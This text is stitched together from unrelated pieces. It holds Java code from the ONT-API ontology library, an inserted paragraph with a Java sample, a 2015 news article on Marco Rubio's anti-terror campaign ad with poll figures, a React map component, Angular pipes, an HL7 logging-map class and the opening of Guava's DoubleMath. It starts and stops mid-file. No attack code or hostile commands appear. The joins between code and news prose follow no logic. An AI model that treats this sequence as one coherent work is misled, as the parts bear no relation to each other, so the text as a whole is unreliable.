extends OntFR> type) { if (OntFR.Length.class == type) return OWLFacet.LENGTH; if (OntFR.MinLength.class == type) return OWLFacet.MIN_LENGTH; if (OntFR.MaxLength.class == type) return OWLFacet.MAX_LENGTH; if (OntFR.MinInclusive.class == type) return OWLFacet.MIN_INCLUSIVE; if (OntFR.MaxInclusive.class == type) return OWLFacet.MAX_INCLUSIVE; if (OntFR.MinExclusive.class == type) return OWLFacet.MIN_EXCLUSIVE; if (OntFR.MaxExclusive.class == type) return OWLFacet.MAX_EXCLUSIVE; if (OntFR.Pattern.class == type) return OWLFacet.PATTERN; if (OntFR.FractionDigits.class == type) return OWLFacet.FRACTION_DIGITS; if (OntFR.TotalDigits.class == type) return OWLFacet.TOTAL_DIGITS; if (OntFR.LangRange.class == type) return OWLFacet.LANG_RANGE; throw new OntApiException.IllegalArgument("Unsupported facet restriction " + type); } /** * Calculates an {@link OWLDataRange} wrapped by {@link ONTObject}. * Note: this method is recursive. * * @param dr {@link OntDR Ontology Data Range} to map * @param of {@link InternalObjectFactory} * @param seen Set of {@link Resource} * @return {@link ONTObject} around {@link OWLDataRange} * @throws OntApiException if something is wrong. */ @SuppressWarnings("unchecked") public static ONTObject<? 
extends OWLDataRange> calcDataRange(OntDR dr, InternalObjectFactory of, Set<Resource> seen) { if (OntApiException.notNull(dr, "Null data range").isURIResource()) { return of.getDatatype(dr.as(OntDT.class)); } if (seen.contains(dr)) { throw new OntApiException("Recursive loop on data range " + dr); } seen.add(dr); DataFactory df = of.getOWLDataFactory(); if (dr instanceof OntDR.Restriction) { OntDR.Restriction _dr = (OntDR.Restriction) dr; ONTObject<OWLDatatype> d = of.getDatatype(_dr.getValue()); Set<ONTObject<OWLFacetRestriction>> restrictions = OntModels.listMembers(_dr.getList()) .mapWith(of::getFacetRestriction).toSet(); OWLDataRange res = df.getOWLDatatypeRestriction(d.getOWLObject(), restrictions.stream().map(ONTObject::getOWLObject).collect(Collectors.toList())); return ONTWrapperImpl.create(res, dr).append(restrictions); } if (dr instanceof OntDR.ComplementOf) { OntDR.ComplementOf _dr = (OntDR.ComplementOf) dr; ONTObject<? extends OWLDataRange> d = calcDataRange(_dr.getValue(), of, seen); return ONTWrapperImpl.create(df.getOWLDataComplementOf(d.getOWLObject()), _dr).append(d); } if (dr instanceof OntDR.UnionOf || dr instanceof OntDR.IntersectionOf) { OntDR.ComponentsDR<OntDR> _dr = (OntDR.ComponentsDR<OntDR>) dr; Set<ONTObject<OWLDataRange>> dataRanges = OntModels.listMembers(_dr.getList()) .mapWith(d -> (ONTObject<OWLDataRange>) calcDataRange(d, of, seen)).toSet(); OWLDataRange res = dr instanceof OntDR.UnionOf ? 
df.getOWLDataUnionOf(dataRanges.stream().map(ONTObject::getOWLObject)) : df.getOWLDataIntersectionOf(dataRanges.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(res, dr).append(dataRanges); } if (dr instanceof OntDR.OneOf) { OntDR.OneOf _dr = (OntDR.OneOf) dr; Set<ONTObject<OWLLiteral>> literals = _dr.getList().members().map(of::getLiteral) .collect(Collectors.toSet()); OWLDataRange res = df.getOWLDataOneOf(literals.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(res, _dr); } throw new OntApiException("Unsupported data range expression " + dr); } /** * Calculates an {@link OWLClassExpression} wrapped by {@link ONTObject}. * Note: this method is recursive. * * @param ce {@link OntCE Ontology Class Expression} to map * @param of {@link InternalObjectFactory} * @param seen Set of {@link Resource}, * a subsidiary collection to prevent possible graph recursions * (e.g. {@code _:b0 owl:complementOf _:b0}) * @return {@link ONTObject} around {@link OWLClassExpression} * @throws OntApiException if something is wrong. */ @SuppressWarnings("unchecked") public static ONTObject<? extends OWLClassExpression> calcClassExpression(OntCE ce, InternalObjectFactory of, Set<Resource> seen) { if (OntApiException.notNull(ce, "Null class expression").isURIResource()) { return of.getClass(ce.as(OntClass.class)); } if (!seen.add(ce)) { throw new OntApiException("Recursive loop on class expression " + ce); } DataFactory df = of.getOWLDataFactory(); Class<? extends OntObject> type = OntModels.getOntType(ce); if (OntCE.ObjectSomeValuesFrom.class.equals(type) || OntCE.ObjectAllValuesFrom.class.equals(type)) { OntCE.ComponentRestrictionCE<OntCE, OntOPE> _ce = (OntCE.ComponentRestrictionCE<OntCE, OntOPE>) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? 
extends OWLClassExpression> c = calcClassExpression(_ce.getValue(), of, seen); OWLClassExpression owl; if (OntCE.ObjectSomeValuesFrom.class.equals(type)) { owl = df.getOWLObjectSomeValuesFrom(p.getOWLObject(), c.getOWLObject()); } else { owl = df.getOWLObjectAllValuesFrom(p.getOWLObject(), c.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(c); } if (OntCE.DataSomeValuesFrom.class.equals(type) || OntCE.DataAllValuesFrom.class.equals(type)) { OntCE.ComponentRestrictionCE<OntDR, OntNDP> _ce = (OntCE.ComponentRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLDataRange> d = of.getDatatype(_ce.getValue()); OWLClassExpression owl; if (OntCE.DataSomeValuesFrom.class.equals(type)) { owl = df.getOWLDataSomeValuesFrom(p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataAllValuesFrom(p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } if (OntCE.ObjectHasValue.class.equals(type)) { OntCE.ObjectHasValue _ce = (OntCE.ObjectHasValue) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLIndividual> i = of.getIndividual(_ce.getValue()); return ONTWrapperImpl.create(df.getOWLObjectHasValue(p.getOWLObject(), i.getOWLObject()), _ce).append(p).append(i); } if (OntCE.DataHasValue.class.equals(type)) { OntCE.DataHasValue _ce = (OntCE.DataHasValue) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<OWLLiteral> l = of.getLiteral(_ce.getValue()); return ONTWrapperImpl.create(df.getOWLDataHasValue(p.getOWLObject(), l.getOWLObject()), _ce).append(p); } if (OntCE.ObjectMinCardinality.class.equals(type) || OntCE.ObjectMaxCardinality.class.equals(type) || OntCE.ObjectCardinality.class.equals(type)) { OntCE.CardinalityRestrictionCE<OntCE, OntOPE> _ce = (OntCE.CardinalityRestrictionCE<OntCE, OntOPE>) ce; ONTObject<? 
extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLClassExpression> c = calcClassExpression(_ce.getValue() == null ? _ce.getModel().getOWLThing() : _ce.getValue(), of, seen); OWLObjectCardinalityRestriction owl; if (OntCE.ObjectMinCardinality.class.equals(type)) { owl = df.getOWLObjectMinCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } else if (OntCE.ObjectMaxCardinality.class.equals(type)) { owl = df.getOWLObjectMaxCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } else { owl = df.getOWLObjectExactCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(c); } if (OntCE.DataMinCardinality.class.equals(type) || OntCE.DataMaxCardinality.class.equals(type) || OntCE.DataCardinality.class.equals(type)) { OntCE.CardinalityRestrictionCE<OntDR, OntNDP> _ce = (OntCE.CardinalityRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLDataRange> d = of.getDatatype(_ce.getValue() == null ? _ce.getModel().getOntEntity(OntDT.class, RDFS.Literal) : _ce.getValue()); OWLDataCardinalityRestriction owl; if (OntCE.DataMinCardinality.class.equals(type)) { owl = df.getOWLDataMinCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } else if (OntCE.DataMaxCardinality.class.equals(type)) { owl = df.getOWLDataMaxCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataExactCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } if (OntCE.HasSelf.class.equals(type)) { OntCE.HasSelf _ce = (OntCE.HasSelf) ce; ONTObject<? 
extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); return ONTWrapperImpl.create(df.getOWLObjectHasSelf(p.getOWLObject()), _ce).append(p); } if (OntCE.UnionOf.class.equals(type) || OntCE.IntersectionOf.class.equals(type)) { OntCE.ComponentsCE<OntCE> _ce = (OntCE.ComponentsCE<OntCE>) ce; Set<ONTObject<OWLClassExpression>> components = OntModels.listMembers(_ce.getList()) .mapWith(c -> (ONTObject<OWLClassExpression>) calcClassExpression(c, of, seen)) .toSet(); OWLClassExpression owl; if (OntCE.UnionOf.class.equals(type)) { owl = df.getOWLObjectUnionOf(components.stream().map(ONTObject::getOWLObject)); } else { owl = df.getOWLObjectIntersectionOf(components.stream().map(ONTObject::getOWLObject)); } return ONTWrapperImpl.create(owl, _ce).append(components); } if (OntCE.OneOf.class.equals(type)) { OntCE.OneOf _ce = (OntCE.OneOf) ce; Set<ONTObject<OWLIndividual>> components = OntModels.listMembers(_ce.getList()) .mapWith(i -> (ONTObject<OWLIndividual>) of.getIndividual(i)).toSet(); OWLClassExpression owl = df.getOWLObjectOneOf(components.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(owl, _ce).append(components); } if (ce instanceof OntCE.ComplementOf) { OntCE.ComplementOf _ce = (OntCE.ComplementOf) ce; ONTObject<? extends OWLClassExpression> c = calcClassExpression(_ce.getValue(), of, seen); return ONTWrapperImpl.create(df.getOWLObjectComplementOf(c.getOWLObject()), _ce).append(c); } if (ce instanceof OntCE.NaryRestrictionCE) { OntCE.NaryRestrictionCE<OntDR, OntNDP> _ce = (OntCE.NaryRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? 
extends OWLDataRange> d = of.getDatatype(_ce.getValue()); OWLClassExpression owl; if (OntCE.NaryDataSomeValuesFrom.class.equals(type)) { owl = df.getOWLDataSomeValuesFrom(p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataAllValuesFrom(p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } throw new OntApiException("Unsupported class expression " + ce); } /** * @param var {@link OntSWRL.Variable} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLVariable} */ public static ONTObject<SWRLVariable> getSWRLVariable(OntSWRL.Variable var, InternalObjectFactory of) { if (!OntApiException.notNull(var, "Null swrl var").isURIResource()) { throw new OntApiException("Anonymous swrl var " + var); } return ONTWrapperImpl.create(of.getOWLDataFactory().getSWRLVariable(of.toIRI(var.getURI())), var); } /** * @param arg {@link OntSWRL.DArg} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLDArgument} */ public static ONTObject<? extends SWRLDArgument> getSWRLLiteralArg(OntSWRL.DArg arg, InternalObjectFactory of) { if (OntApiException.notNull(arg, "Null SWRL-D arg").isLiteral()) { return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLLiteralArgument(of.getLiteral(arg.asLiteral()).getOWLObject()), arg); } if (arg.canAs(OntSWRL.Variable.class)) { return of.getSWRLVariable(arg.as(OntSWRL.Variable.class)); } throw new OntApiException("Unsupported SWRL-D arg " + arg); } /** * @param arg {@link OntSWRL.IArg} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLIArgument} */ public static ONTObject<? 
extends SWRLIArgument> getSWRLIndividualArg(OntSWRL.IArg arg, InternalObjectFactory of) { if (OntApiException.notNull(arg, "Null SWRL-I arg").canAs(OntIndividual.class)) { return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLIndividualArgument(of.getIndividual(arg.as(OntIndividual.class)).getOWLObject()), arg); } if (arg.canAs(OntSWRL.Variable.class)) { return of.getSWRLVariable(arg.as(OntSWRL.Variable.class)); } throw new OntApiException("Unsupported SWRL-I arg " + arg); } /** * @param atom {@link OntSWRL.Atom} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLAtom} */ public static ONTObject<? extends SWRLAtom> calcSWRLAtom(OntSWRL.Atom atom, InternalObjectFactory of) { if (atom instanceof OntSWRL.Atom.BuiltIn) { OntSWRL.Atom.BuiltIn _atom = (OntSWRL.Atom.BuiltIn) atom; IRI iri = of.toIRI(_atom.getPredicate().getURI()); List<ONTObject<? extends SWRLDArgument>> arguments = _atom.arguments().map(of::getSWRLArgument) .collect(Collectors.toList()); SWRLAtom res = of.getOWLDataFactory().getSWRLBuiltInAtom(iri, arguments.stream().map(ONTObject::getOWLObject) .collect(Collectors.toList())); return ONTWrapperImpl.create(res, _atom).appendWildcards(arguments); } if (atom instanceof OntSWRL.Atom.OntClass) { OntSWRL.Atom.OntClass _atom = (OntSWRL.Atom.OntClass) atom; ONTObject<? extends OWLClassExpression> c = of.getClass(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> a = of.getSWRLArgument(_atom.getArg()); return ONTWrapperImpl.create(of.getOWLDataFactory().getSWRLClassAtom(c.getOWLObject(), a.getOWLObject()), _atom) .append(c).append(a); } if (atom instanceof OntSWRL.Atom.DataProperty) { OntSWRL.Atom.DataProperty _atom = (OntSWRL.Atom.DataProperty) atom; ONTObject<OWLDataProperty> p = of.getProperty(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? 
extends SWRLDArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDataPropertyAtom(p.getOWLObject(), f.getOWLObject(), s.getOWLObject()), _atom) .append(p).append(f).append(s); } if (atom instanceof OntSWRL.Atom.ObjectProperty) { OntSWRL.Atom.ObjectProperty _atom = (OntSWRL.Atom.ObjectProperty) atom; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLObjectPropertyAtom(p.getOWLObject(), f.getOWLObject(), s.getOWLObject()), _atom) .append(p).append(f).append(s); } if (atom instanceof OntSWRL.Atom.DataRange) { OntSWRL.Atom.DataRange _atom = (OntSWRL.Atom.DataRange) atom; ONTObject<? extends OWLDataRange> d = of.getDatatype(_atom.getPredicate()); ONTObject<? extends SWRLDArgument> a = of.getSWRLArgument(_atom.getArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDataRangeAtom(d.getOWLObject(), a.getOWLObject()), _atom).append(d).append(a); } if (atom instanceof OntSWRL.Atom.DifferentIndividuals) { OntSWRL.Atom.DifferentIndividuals _atom = (OntSWRL.Atom.DifferentIndividuals) atom; ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDifferentIndividualsAtom(f.getOWLObject(), s.getOWLObject()), _atom).append(f).append(s); } if (atom instanceof OntSWRL.Atom.SameIndividuals) { OntSWRL.Atom.SameIndividuals _atom = (OntSWRL.Atom.SameIndividuals) atom; ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? 
extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLSameIndividualAtom(f.getOWLObject(), s.getOWLObject()), _atom).append(f).append(s); } throw new OntApiException("Unsupported SWRL atom " + atom); } }
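The getFacet method above resolves an OWLFacet constant from the Java type of the facet restriction via a long if-chain; the same type-to-constant dispatch can be made table-driven with a map keyed by class. A minimal self-contained sketch of that alternative, using illustrative stand-in types rather than ONT-API's OntFR hierarchy:

```java
import java.util.HashMap;
import java.util.Map;

public class FacetDispatch {
    // Stand-ins for the OntFR marker types.
    interface Restriction {}
    static final class MinLength implements Restriction {}
    static final class MaxLength implements Restriction {}
    static final class Pattern implements Restriction {}

    // Table-driven replacement for the if-chain: class -> facet name.
    private static final Map<Class<? extends Restriction>, String> FACETS = new HashMap<>();
    static {
        FACETS.put(MinLength.class, "MIN_LENGTH");
        FACETS.put(MaxLength.class, "MAX_LENGTH");
        FACETS.put(Pattern.class, "PATTERN");
    }

    /** Looks up the facet constant for a restriction type, rejecting unknown types. */
    public static String facetFor(Class<? extends Restriction> type) {
        String facet = FACETS.get(type);
        if (facet == null)
            throw new IllegalArgumentException("Unsupported facet restriction " + type);
        return facet;
    }

    public static void main(String[] args) {
        System.out.println(facetFor(MinLength.class)); // prints: MIN_LENGTH
    }
}
```

Either form works; the map variant keeps additions to one line per facet, while the if-chain in the source avoids static-initializer state.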
Florida Sen. Marco Rubio has released the first television ad of his Republican presidential campaign, warning Americans that terror attacks like the ones that happened in Paris could happen in the United States.

“This is a civilizational struggle between the values of freedom and liberty and radical Islamic terror,” Rubio says in the 30-second spot scheduled to begin airing nationally on Tuesday. “What happened in Paris could happen here.”

“There is no middle ground,” the GOP candidate continues. “These aren’t disgruntled or disempowered people. These are radical terrorists who want to kill us, because we let women drive, because we let girls go to school.”

He adds: “I’m Marco Rubio. I approve this message because there can be no arrangement or negotiation. Either they win or we do.”

According to an ABC News/Washington Post national poll released Sunday, Rubio (11 percent) currently sits in third place, trailing frontrunner Donald Trump (32 percent) and retired neurosurgeon Ben Carson (22 percent) in the race for the Republican nomination. The Florida senator is also the only candidate other than Trump and Carson to register double-digit support among GOP voters.

Meanwhile, most voters trust former Secretary of State Hillary Clinton to handle terrorism more than any of the three leading GOP candidates.

Who would you trust more to handle terrorism?

• Hillary Clinton: 50 percent vs. Donald Trump: 42 percent
• Hillary Clinton: 49 percent vs. Ben Carson: 40 percent
• Hillary Clinton: 47 percent vs. Marco Rubio: 43 percent

Source: ABC News/Washington Post survey, Nov. 16-19, 2015

The poll also found a vast majority of Americans (81 percent) “think it is likely that there will be a terrorist attack in the U.S. in the near future that will cause large numbers of lives to be lost.” Just 18 percent of Americans do not think such an attack is likely to occur.

In an interview with “Fox News Sunday,” Rubio said it’s obvious why the United States is a target for terror.
“The United States is the ultimate prize in their mind,” he said. “If ISIS is able to conduct a successful operation in the U.S., or I believe even Canada for that matter, of the scale of what you saw in Paris, it would be an enormous bonanza for them in terms of funding but also recruits from all over the world; that would be a huge messaging win for ISIS and continue to grow their movement.”

Rubio’s plan to fight ISIS includes expanding air strikes and embedding U.S. forces with Sunni and Kurdish forces on the ground in Syria.

“We need a ground force that defeats ISIS, and it should be made up primarily of Arab Sunnis,” he said. “That’s the only way you’re going to defeat them. They have to be defeated by Arab Sunnis themselves. So, they’re going to be the bulk of the ground force. There will have to be American operators embedded alongside them — special operators are combat troops.”

But Rubio added that the number of U.S. ground forces his plan calls for would not reach the levels of previous U.S. operations. “This is not a return to Iraq,” he said.
import KeyedGeoJSON from './geojson' /** * Display patterns as GeoJSON on Leaflet. */ export default function Patterns({ color, patterns }: { color: string patterns: GTFS.Pattern[] }) { return ( <> {patterns.map((p) => ( <KeyedGeoJSON color={color} data={p.geometry} key={p._id} weight={3} /> ))} </> ) }
import { Pipe, PipeTransform } from '@angular/core'; import { ScheduleEngineStepShared, ScheduleFlowStepShared, ScheduleGlobalAction, ScheduleGlobalStepShared, } from '@rg-share'; @Pipe({ name: 'isScheduleFlowStep' }) export class IsScheduleFlowStepPipe implements PipeTransform { transform(value: any): value is ScheduleFlowStepShared { return value instanceof ScheduleFlowStepShared; } } @Pipe({ name: 'isScheduleEngineStep' }) export class IsScheduleEngineStepPipe implements PipeTransform { transform(value: any): value is ScheduleEngineStepShared<any> { return value instanceof ScheduleEngineStepShared; } } @Pipe({ name: 'isScheduleGlobalStep' }) export class IsScheduleGlobalStepPipe implements PipeTransform { transform(value: any): value is ScheduleGlobalStepShared { return value instanceof ScheduleGlobalStepShared; } } @Pipe({ name: 'isScheduleFlowLoopStep' }) export class IsScheduleFlowLoopStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'loop'; } } @Pipe({ name: 'isScheduleFlowIfStep' }) export class IsScheduleFlowIfStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'if'; } } @Pipe({ name: 'isScheduleFlowSwitchStep' }) export class IsScheduleFlowSwitchStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'switch'; } } @Pipe({ name: 'isScheduleGlobalInitEngineStep' }) export class IsScheduleGlobalInitEngineStepPipe implements PipeTransform { transform(value: ScheduleGlobalStepShared['action']): boolean { return value === ScheduleGlobalAction.initEngine; } }
/*
 * Copyright 2015 Cognitive Medical Systems, Inc (http://www.cognitivemedicine.com).
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.socraticgrid.hl7.services.orders.logging;

import java.util.HashMap;

public class LogEntryMappings {

	private static HashMap<LogEntryType,LogEntryGroup> entryGroupMap;
	private static HashMap<LogEntryType,LogEntryLevels> entryLevelMap;

	static {
		entryGroupMap = new HashMap<LogEntryType,LogEntryGroup>();

		entryGroupMap.put(LogEntryType.User_AuthenticationSuccess,LogEntryGroup.Authenication);
		entryGroupMap.put(LogEntryType.User_AuthenticationFailure,LogEntryGroup.Authenication);
		entryGroupMap.put(LogEntryType.User_ExceptionUsingService,LogEntryGroup.Exception);
		entryGroupMap.put(LogEntryType.User_CreateOrder,LogEntryGroup.Create);
		entryGroupMap.put(LogEntryType.User_CancelOrder,LogEntryGroup.Update);
		entryGroupMap.put(LogEntryType.User_ChangeOrder,LogEntryGroup.Update);
		entryGroupMap.put(LogEntryType.User_WorflowUpdate,LogEntryGroup.Workflow);
		entryGroupMap.put(LogEntryType.Fullfilment_Accepted,LogEntryGroup.Fullfilment);
		entryGroupMap.put(LogEntryType.Fullfilment_Rejected,LogEntryGroup.Fullfilment);
		entryGroupMap.put(LogEntryType.Fullfilment_Updated,LogEntryGroup.Fullfilment);
		entryGroupMap.put(LogEntryType.System_Startup,LogEntryGroup.Operational);
		entryGroupMap.put(LogEntryType.System_Shutdown,LogEntryGroup.Operational);
		entryGroupMap.put(LogEntryType.System_DirtyStartup,LogEntryGroup.Operational);
entryGroupMap.put(LogEntryType.System_ServiceDown,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_ServiceUp,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_InternalError,LogEntryGroup.Exception); entryGroupMap.put(LogEntryType.General,LogEntryGroup.Diagnostic); entryGroupMap.put(LogEntryType.Diagnostic,LogEntryGroup.Diagnostic); entryGroupMap.put(LogEntryType.Trace,LogEntryGroup.Diagnostic); entryLevelMap = new HashMap<LogEntryType,LogEntryLevels> (); entryLevelMap.put(LogEntryType.User_AuthenticationSuccess,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.User_AuthenticationFailure,new LogEntryLevels(EventLevel.debug,EventLevel.warn)); entryLevelMap.put(LogEntryType.User_ExceptionUsingService,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_CreateOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_CancelOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_ChangeOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_WorflowUpdate,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Fullfilment_Accepted,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.Fullfilment_Rejected,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Fullfilment_Updated,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_Startup,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_Shutdown,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.System_DirtyStartup,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_ServiceDown,new LogEntryLevels(EventLevel.debug,EventLevel.error)); 
entryLevelMap.put(LogEntryType.System_ServiceUp,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_InternalError,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.General,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Diagnostic,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.Trace,new LogEntryLevels(EventLevel.debug,EventLevel.info)); } static public LogEntryGroup getLogEntryGroup(LogEntryType entry) { return entryGroupMap.get(entry); } static public LogEntryLevels getLogEntryLevels(LogEntryType entry) { return entryLevelMap.get(entry); } }
/*
 * Copyright (C) 2011 The Guava Authors
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.google.common.math;

import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.math.MathPreconditions.checkNonNegative;
import static java.lang.Math.log;

import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.primitives.Booleans;

/**
 * A class for arithmetic on doubles that is not covered by {@link java.lang.Math}.
 *
 * @author <NAME>
 * @since 11.0
 */
@GwtCompatible(emulated = true)
public final class DoubleMath {
  /*
   * This method returns a value y such that rounding y DOWN (towards zero) gives the same result
   * as rounding x according to the specified mode.
   */
  private static final double MIN_INT_AS_DOUBLE = -0x1p31;
  private static final double MAX_INT_AS_DOUBLE = 0x1p31 - 1.0;

  private static final double MIN_LONG_AS_DOUBLE = -0x1p63;
  /*
   * We cannot store Long.MAX_VALUE as a double without losing precision. Instead, we store
   * Long.MAX_VALUE + 1 == -Long.MIN_VALUE, and then offset all comparisons by 1.
   */
  private static final double MAX_LONG_AS_DOUBLE_PLUS_ONE = 0x1p63;

  /**
   * Returns the base 2 logarithm of a double value.
   *
   * <p>Special cases:
   * <ul>
   * <li>If {@code x} is NaN or less than zero, the result is NaN.
   * <li>If {@code x} is positive infinity, the result is positive infinity.
   * <li>If {@code x} is positive or negative zero, the result is negative infinity.
   * </ul>
   *
   * <p>The computed result is within 1 ulp of the exact result.
   *
   * <p>If the result of this method will be immediately rounded to an {@code int},
   * {@link #log2(double, RoundingMode)} is faster.
   */
  public static double log2(double x) {
    return log(x) / LN_2; // surprisingly within 1 ulp according to tests
  }

  private static final double LN_2 = log(2);

  /**
   * Returns {@code n!}, that is, the product of the first {@code n} positive
   * integers, {@code 1} if {@code n == 0}, or
   * {@link Double#POSITIVE_INFINITY} if {@code n! > Double.MAX_VALUE}.
   *
   * <p>The result is within 1 ulp of the true value.
   *
   * @throws IllegalArgumentException if {@code n < 0}
   */
  public static double factorial(int n) {
    checkNonNegative("n", n);
    if (n > MAX_FACTORIAL) {
      return Double.POSITIVE_INFINITY;
    } else {
      // Multiplying the last (n & 0xf) values into their own accumulator gives a more accurate
      // result than multiplying by everySixteenthFactorial[n >> 4] directly.
      double accum = 1.0;
      for (int i = 1 + (n & ~0xf); i <= n; i++) {
        accum *= i;
      }
      return accum * everySixteenthFactorial[n >> 4];
    }
  }

  @VisibleForTesting static final int MAX_FACTORIAL = 170;

  @VisibleForTesting
  static final double[] everySixteenthFactorial = {
      0x1.0p0, 0x1.30777758p44, 0x1.956ad0aae33a4p117, 0x1.ee69a78d72cb6p202,
      0x1.fe478ee34844ap295, 0x1.c619094edabffp394, 0x1.3638dd7bd6347p498,
      0x1.7cac197cfe503p605, 0x1.1e5dfc140e1e5p716, 0x1.8ce85fadb707ep829,
      0x1.95d5f3d928edep945};

  /**
   * Returns {@code true} if {@code a} and {@code b} are within {@code tolerance} of each other.
   *
   * <p>Technically speaking, this is equivalent to
   * {@code Math.abs(a - b) <= tolerance || Double.valueOf(a).equals(Double.valueOf(b))}.
   *
   * <p>Notable special cases include:
   * <ul>
   * <li>All NaNs are fuzzily equal.
   * <li>If {@code a == b}, then {@code a} and {@code b} are always fuzzily equal.
   * <li>Positive and negative zero are always fuzzily equal.
   * <li>If {@code tolerance} is zero, and neither {@code a} nor {@code b} is NaN, then
   * {@code a} and {@code b} are fuzzily equal if and only if {@code a == b}.
   * <li>With {@link Double#POSITIVE_INFINITY} tolerance, all non-NaN values are fuzzily equal.
   * <li>With finite tolerance, {@code Double.POSITIVE_INFINITY} and {@code
   * Double.NEGATIVE_INFINITY} are fuzzily equal only to themselves.
   * </ul>
   *
